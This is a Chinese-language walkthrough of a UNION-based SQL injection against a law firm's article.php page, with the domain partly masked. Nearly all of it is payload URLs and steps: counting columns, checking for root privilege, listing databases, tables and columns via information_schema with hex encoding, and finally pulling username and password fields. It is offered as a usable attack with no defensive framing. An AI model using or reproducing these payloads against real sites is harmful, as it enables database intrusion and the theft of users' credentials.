注:爲了網站的安全,對網址做了處理
http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出錯,那麼就是14
http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
------------------------------------------------
頁面出現的數字是8和12
------------------------------------------------
用以下的函數來得到我們想要的
用函數來替換12,得到相關的信息
-----------------------------------------------
判斷權限
ord(mid(user(),1,1))=114/* 返回錯誤就不是root權限
--------------------------------------
列出數據庫表 需要轉編碼
unhex(hex(group_concat(schema_name)))
(table_name)))
(column_name)))
例如:
http://www.lawyexxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(schema_name)))
,13,14 from information_schema.schemata 列出數據庫 information_schema,lawyerxxxxxx------------------------------------------
下面的需要轉碼的 轉爲hex編碼 (用工具轉)
-----------------------------------------------------------------------------------
追加列表
from information_schema.schemata 列數據庫
from information_schema.tables where table_shema= 列用戶
from information_schema.columns where table_name= 列表
例如:
http://www.lawyexxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(table_name)))
,13,14 from information_schema.tables where table_shema=0x6C6177796572666xxxxxx(lawyerxxxx20xx)(數據庫名)
http://www.lawyerxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(column_name)))
,13,14 from information_schema.columns where table_name=(表名)
-------------------------------------------
上面的需要轉碼的轉爲hex編碼
--------------------------------------------------------------------------------
獲取用戶名:
http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,用戶字段名,9,10,11,
密碼字段名,13,14 from 表名